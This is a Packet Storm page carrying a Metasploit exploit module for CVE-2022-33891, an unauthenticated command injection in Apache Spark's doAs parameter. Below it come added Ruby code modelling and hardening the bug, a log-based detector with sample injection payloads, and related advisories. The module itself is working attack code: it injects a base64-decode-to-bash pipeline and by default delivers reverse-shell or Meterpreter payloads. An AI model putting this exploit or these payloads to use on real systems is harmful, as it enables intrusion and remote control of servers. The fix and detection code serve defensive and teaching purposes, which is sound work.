Apache Spark Unauthenticated Command Injection

This Metasploit module exploits an unauthenticated command injection vulnerability in Apache Spark (CVE-2022-33891). Successful exploitation results in remote code execution in the context of the user the Spark application runs as. The injection exists because, when ACLs are enabled, Spark resolves the group membership of the user name supplied in the doAs parameter by building and running a raw Unix shell command, so shell metacharacters in that name are executed. The code path is only reachable when the non-default setting spark.acls.enable is true; with the default of false the group check never runs. Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected; the follow-up advisory CVE-2023-32007 (see Related news) notes that 3.1.3 was also affected, contrary to the original disclosure.

Packet Storm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Spark Unauthenticated Command Injection RCE',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in Apache Spark.
          Successful exploitation results in remote code execution under the context of the Spark application user.
          The command injection occurs because Spark checks the group membership of the user passed
          in the ?doAs parameter by using a raw Linux command.
          It is triggered by a non-default setting called spark.acls.enable.
          This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.
          Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
        ],
        'References' => [
          ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure
          ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis
          ['CVE', '2022-33891']
        ],
        'DefaultOptions' => {
          'SSL' => false,
          'WfsDelay' => 5
        },
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix (In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :in_memory,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'CmdStagerFlavor' => ['printf', 'curl'],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2022-07-18',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
  end

  # The command is base64-encoded so that the doAs value only has to carry a
  # fixed decode-and-run pipeline inside backticks; the real payload never has
  # to survive shell quoting or URL encoding itself.
  def execute_command(cmd, _opts = {})
    b64 = Rex::Text.encode_base64(cmd)
    post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"
    return send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/'),
      'data' => post_data
    })
  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e
    elog("A communication error occurred: #{e.message}", error: e)
  end

  def check
    print_status("Checking if #{peer} can be exploited!")
    res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")
    return CheckCode::Unknown('Did not receive a response from target.') unless res

    # With spark.acls.enable set, an impersonated user that fails the ACL
    # check is refused with 403; any other status means the group lookup
    # (and therefore the injection) is not being reached.
    if res.code != 403
      return CheckCode::Safe('Target did not respond with a 403 response.')
    end

    # The injected command's output is never returned, so confirm execution
    # with a blind, time-based probe.
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end
    print_status("Elapsed time: #{elapsed_time} seconds.")

    unless res && elapsed_time >= sleep_time
      return CheckCode::Safe('Failed to test command injection.')
    end

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    print_status('Exploiting...')
    case target['Type']
    when :in_memory
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space
    end
  end
end
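The bug class the module abuses, reduced to a few lines of Ruby. This is an added example, not code from the Metasploit module or from Apache Spark: the vulnerable function interpolates an attacker-controlled doAs user name into a command line that a shell parses, and the hardened one validates the name against the portable POSIX user-name alphabet and passes it to `id` as a separate argv element so no shell ever sees it. It assumes a POSIX system with `sh` and `id` on PATH; the exact command line Spark builds is not reproduced, and the `spark$(echo INJECTED >&2)` value is a constructed probe whose only effect is to write a marker to stderr.

```ruby
# Added example (not from the Metasploit module or from Apache Spark): a
# minimal model of the command injection behind CVE-2022-33891.
# Assumes a POSIX system with `sh` and `id` on PATH.
require 'open3'

# Vulnerable: the user name is spliced into a string that a shell interprets.
# A value such as  spark$(echo INJECTED >&2)  runs the substituted command
# before `id` is even invoked; the substitution's stdout becomes part of the
# argument, while anything written to stderr shows up in the merged output.
def vulnerable_groups_for(user)
  out, _status = Open3.capture2e('sh', '-c', "id -Gn #{user}")
  out
end

# Portable POSIX user-name character set (IEEE Std 1003.1 portable filename
# characters, starting with a letter or underscore). Assumed policy, not
# Spark's.
USERNAME_RE = /\A[a-z_][a-z0-9_-]{0,31}\z/

# Hardened: reject anything that is not a plausible user name, then call
# `id` with an argv array so there is no shell between us and the binary.
def hardened_groups_for(user)
  raise ArgumentError, "invalid user name: #{user.inspect}" unless user.match?(USERNAME_RE)

  out, status = Open3.capture2('id', '-Gn', user)
  return [] unless status.success? # unknown user: no groups, nothing executed

  out.split
end

# True when the shell executed the injected command (marker reached stderr).
def injection_succeeded?(user)
  vulnerable_groups_for(user).include?('INJECTED')
end

if $PROGRAM_NAME == __FILE__
  probe = 'spark$(echo INJECTED >&2)' # constructed, harmless probe value
  puts "vulnerable path executed injected command: #{injection_succeeded?(probe)}"
  begin
    hardened_groups_for(probe)
  rescue ArgumentError => e
    puts "hardened path rejected it: #{e.message}"
  end
  puts "hardened path, root: #{hardened_groups_for('root').inspect}"
end
```

The validation step matters on its own: even with argv-style execution, a user name is later used in ACL comparisons and log lines, so a denylist of shell metacharacters would be the wrong fix. The allowlist plus argv execution is the same shape as the upstream fix's intent (stop the string from ever reaching a shell), but the regex here is an assumption for the example.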

Related news

CVE-2023-32007: Security | Apache Spark

** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.

CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability

Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities

The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,

CVE-2022-33891

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
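The impersonation path above leaves a recognisable trace: a doAs value that is not a user name. The following detection is an added example, not part of the advisory, the Metasploit module or Apache Spark. It parses constructed lines in the shape of a reverse proxy's combined access log in front of the Spark UI (the field layout is assumed; real proxies differ) and flags any request whose doAs query parameter contains shell metacharacters or does not look like a user name. One caveat it makes visible: only query strings reach an access log, so a doAs carried in a POST body, which is how the module sends it, needs request-body logging or a WAF in front of the UI to be seen at all.

```ruby
# Added example (not from the advisory, the Metasploit module or Apache Spark):
# flag Spark UI requests whose doAs parameter is not a plausible user name.
# The log lines are constructed for the example; the combined-log layout is
# an assumption about what a reverse proxy in front of the UI would write.
require 'uri'

SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [18/Jul/2022:10:01:02 +0000] "GET /?doAs=alice HTTP/1.1" 403 0
  10.0.0.9 - - [18/Jul/2022:10:01:05 +0000] "GET /?doAs=%60echo%20aWQ%3D%20%7C%20base64%20-d%20%7C%20bash%60 HTTP/1.1" 403 0
  10.0.0.9 - - [18/Jul/2022:10:01:07 +0000] "GET /jobs/?doAs=spark%24(sleep%208) HTTP/1.1" 403 0
  10.0.0.5 - - [18/Jul/2022:10:02:00 +0000] "POST / HTTP/1.1" 403 0
  10.0.0.7 - - [18/Jul/2022:10:02:30 +0000] "GET /environment/ HTTP/1.1" 200 5120
LOG

# Combined access-log request line: client, timestamp, method, path, status.
REQUEST_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
# Portable POSIX user-name alphabet (assumed policy for what doAs may carry).
USERNAME_RE = /\A[a-z_][a-z0-9_-]{0,31}\z/
# Characters that let a shell substitute, chain or redirect commands.
SHELL_META = /[`$|;&<>(){}\n]/

# All percent-decoded doAs values in a request path ([] when there is no query).
def doas_values(path)
  query = path.split('?', 2)[1] or return []
  URI.decode_www_form(query).select { |k, _| k == 'doAs' }.map(&:last)
end

# Classify one log line. Returns nil for lines that are not request records,
# otherwise a hash with :suspicious and a human-readable :reason.
def inspect_line(line)
  m = REQUEST_RE.match(line) or return nil
  values = doas_values(m[:path])
  reason =
    if values.any? { |v| v.match?(SHELL_META) } then 'shell metacharacters in doAs'
    elsif values.any? { |v| !v.match?(USERNAME_RE) } then 'doAs is not a plausible user name'
    end
  { ip: m[:ip], ts: m[:ts], method: m[:method], status: m[:status].to_i,
    doas: values, suspicious: !reason.nil?, reason: reason }
end

# Every request in the log that should be escalated.
def suspicious_requests(log)
  log.each_line.map { |l| inspect_line(l.chomp) }.compact.select { |r| r[:suspicious] }
end

if $PROGRAM_NAME == __FILE__
  suspicious_requests(SAMPLE_LOG).each do |r|
    puts "#{r[:ts]} #{r[:ip]} #{r[:method]} status=#{r[:status]} doAs=#{r[:doas].inspect} -> #{r[:reason]}"
  end
end
```

Run against the sample, the two requests from 10.0.0.9 are flagged (the module's own `echo ... | base64 -d | bash` pipeline and a blind sleep probe); the 403 on the plain `alice` request is the normal ACL refusal, and the POST on line four passes through untouched because its doAs is in the body. A 403 alone is therefore not an indicator; the parameter content is.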

CVE-2018-11804: Security | Apache Spark

Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.

CVE-2018-11770: Security | Apache Spark

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.re...
